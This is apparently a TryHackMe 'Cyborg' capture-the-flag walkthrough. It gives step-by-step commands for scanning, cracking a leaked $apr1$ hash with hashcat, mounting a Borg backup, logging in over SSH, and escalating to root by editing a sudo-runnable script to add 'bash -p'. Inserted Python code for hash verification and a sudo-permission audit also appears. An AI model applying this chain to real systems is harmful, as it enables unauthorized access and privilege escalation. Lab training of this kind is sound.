TryHackMe: Cyborg writeup/walkthrough

Writeup for the room ‘Cyborg’ on TryHackMe

Phantom_95
5 min read · Jan 26, 2021

Room Link | Easy difficulty

As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.


Task 1: Deploy the machine

#1. Deploy the machine

No answer needed. Make sure you are connected with your VPN and wait a few minutes for the machine to start.

sudo openvpn --config <THM_VPN_file>

Task 2: Compromise the system

#1. Scan the machine, how many ports are open?

nmap <Cyborg_Machine_IP> -v -sV -A -T4

As you can see, only 2 ports are open, 22 and 80.

#2. What service is running on port 22?

See image above for reference. ssh is running on port 22.

#3. What service is running on port 80?

See image above for reference. http is running on port 80.

#4. What is the user.txt flag?

We can brute-force directories using DirBuster with the directory-list-2.3-medium.txt wordlist.

When brute-forcing directories, we will find some interesting pages and files like /admin, /admin/admin.html, /etc/squid/passwd and /etc/squid/squid.conf.

The /admin/admin.html page reveals that someone left some backup files which we can try to take advantage of.

The /etc/squid/passwd file contains a password hash which we can try to crack.

Using Hashes.com, we can find the hash type so that we can crack it using hashcat.

The hashcat example hashes page shows the exact format of an Apache $apr1$ MD5 hash (mode 1600), which is the format we need to store the hash in.

hashcat --help | grep 'Apache'
locate rockyou.txt
cp <path output from the command above> ./
echo '$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.' > hash.txt
hashcat -m 1600 hash.txt rockyou.txt

I was able to get the password very quickly. Let’s take note of that password.
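To see why this hash falls so quickly, here is an added example (not code from the original post) that implements the Apache $apr1$ scheme in Python and verifies a candidate password against an htpasswd hash field the way `htpasswd -v` does. The known-answer check uses the public test vector from hashcat's example-hashes page for mode 1600 (password "hashcat"); the $apr1$ line from the Cyborg box is only used to show a non-matching candidate returning False. The scheme is a fixed 1000 rounds of MD5 with no tunable cost, which is why a GPU wordlist run finishes in seconds and why htpasswd files should use bcrypt (`htpasswd -B`) instead.

```python
import hashlib
import hmac

# Alphabet of the crypt(3)-style base64 variant (not standard base64).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Public known-answer vector from hashcat's example-hashes page (mode 1600),
# password "hashcat". Not a value from the Cyborg box.
HASHCAT_VECTOR = "$apr1$71850310$gh9m4xcAn3MGxogwX/ztb."


def _to64(value: int, count: int) -> str:
    """Encode `count` 6-bit groups of `value`, least significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: str, salt: str) -> str:
    """Compute an Apache $apr1$ hash (md5crypt with the "$apr1$" magic)."""
    magic = b"$apr1$"
    pw = password.encode()
    salt = salt[:8]  # the algorithm uses at most 8 salt characters
    sb = salt.encode()

    ctx = hashlib.md5(pw + magic + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    for i in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, i)])
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 rounds of MD5: this is all the "stretching" the scheme offers.
    for r in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if r & 1 else final)
        if r % 3:
            ctx1.update(sb)
        if r % 7:
            ctx1.update(pw)
        ctx1.update(final if r & 1 else pw)
        final = ctx1.digest()

    # Bytes are interleaved in this fixed order before encoding.
    order = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order
    )
    encoded += _to64(final[11], 2)
    return f"$apr1${salt}${encoded}"


def verify_htpasswd(hash_field: str, candidate: str) -> bool:
    """Return True if `candidate` matches the $apr1$ hash field (like htpasswd -v)."""
    parts = hash_field.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash field")
    salt = parts[2]
    # Constant-time comparison so a verifier does not leak via timing.
    return hmac.compare_digest(apr1_md5(candidate, salt), hash_field)


if __name__ == "__main__":
    print(verify_htpasswd(HASHCAT_VECTOR, "hashcat"))  # True
    # The hash from the Cyborg box, checked against a wrong candidate only.
    print(verify_htpasswd("$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.", "not-the-password"))  # False
```

A dictionary attack is nothing more than calling `verify_htpasswd` once per wordlist entry; hashcat does exactly that, in parallel on the GPU, and MD5 with 1000 rounds and no memory cost gives it nothing to slow down on.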

Next, download the archive at /admin/archive.tar and extract it in your working directory. Move into the extracted directory and go in final_archive directory:

cd home/field/dev/final_archive/
cat README

Reading the README file shows us that there is a Borg backup repository here, so we can get that backup back using Borg.

sudo apt install borgbackup -y

Test whether borg is installed by typing borg and pressing Enter. If it says "not found" or similar, close and re-open the terminal and try again. Now we can make a directory and use borg to mount the backup there:

borg
mkdir backup
borg mount . backup/
# It will ask for a passphrase; try the password we cracked using hashcat.
cd backup/music_archive/home/alex/Documents
cat note.txt
# note.txt contains a username & password. Earlier, our nmap scan found ssh open on port 22. Let's try this username and password there.
ssh alex@<Cyborg_Machine_IP>
# Enter the password we found in the borg backup.
ls
cat user.txt

#5. What is the root.txt flag?

Let’s check if we can run anything as root.

sudo -l
# You'll see that there is a script we can run with sudo (/etc/mp3backups/backup.sh)
cd /etc/mp3backups/
ls -la backup.sh

As we are logged in as alex, we can only read it right now, but let's change that, since alex owns the file. We can change its permissions using:

chmod 777 backup.sh
# Now backup.sh should have all permissions (-rwxrwxrwx)
ls -la backup.sh
# Let's add a command that runs a bash shell and keeps the root privilege using the -p option. See the image below for where to add the command.
nano backup.sh

The line to add inside backup.sh:

bash -p

# Ctrl + X, press y and then press Enter to save. Let's confirm that the edit we made is saved.
head backup.sh
# Please note that we can't run `sudo backup.sh`; we can only run it by its full path:
sudo /etc/mp3backups/backup.sh
id
# You should be root now.
# Go into the root directory and cat the root flag.
cd ~/../../root/
ls
cat root.txt
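The root step works only because a script that sudo lets alex run as root is owned by alex and writable by alex. As an added example (not code from the original post), here is a small Python audit a defender could run against each command path granted in sudoers: it flags targets that are not root-owned, are group- or world-writable, or sit below a directory that other users can write to (a writable parent lets the file be replaced even when the file itself is locked down). The demo files are constructed in a temporary directory; on the Cyborg box the path to check would be /etc/mp3backups/backup.sh, which should be root-owned with mode 755 or stricter.

```python
import os
import stat
import tempfile
from pathlib import Path


def audit_sudo_target(path: str) -> list:
    """Return a list of findings for one command path that sudoers allows.

    A command root runs on a low-privileged user's behalf must not be
    modifiable by that user: the file and every directory above it should
    be root-owned and neither group- nor world-writable.
    """
    findings = []
    p = Path(path)
    if not p.exists():
        return [f"{path}: does not exist (a writable parent would let someone create it)"]

    st = p.stat()
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        findings.append(f"{path}: group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append(f"{path}: world-writable")

    # Walk up the directory chain: a writable parent allows replacing the file.
    # Sticky directories (like /tmp) stop other users renaming/deleting entries,
    # so they are not reported here.
    for parent in p.resolve().parents:
        pst = parent.stat()
        sticky = pst.st_mode & stat.S_ISVTX
        if pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky:
            findings.append(f"{parent}: writable directory on the path to {path}")
    return findings


def build_demo_dir() -> dict:
    """Create a constructed demo layout in a temp dir (not real system files).

    backup.sh mirrors the weak state from the box (mode 777), good.sh shows the
    expected state (mode 755), missing.sh exists only as a path.
    """
    base = tempfile.mkdtemp(prefix="sudo-audit-demo-")
    os.chmod(base, 0o755)
    paths = {}
    for name, mode in (("backup.sh", 0o777), ("good.sh", 0o755)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho demo\n")
        os.chmod(path, mode)
        paths[name] = path
    paths["missing.sh"] = os.path.join(base, "missing.sh")
    return paths


if __name__ == "__main__":
    demo = build_demo_dir()
    for name, path in demo.items():
        print(f"== {name}")
        for finding in audit_sudo_target(path) or ["ok"]:
            print("  ", finding)
```

In practice the paths come from the `Cmnd_Alias` and user entries in /etc/sudoers and /etc/sudoers.d/*; anything this audit reports is a root shell waiting to happen, and the fix is `chown root:root` plus `chmod 755` (or 700) on the script and its directory.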

That’s all for this room. Follow me for more writeups and see you in the next one!

Phantom_95

I like all things IT but currently focused on being an IT Security Specialist.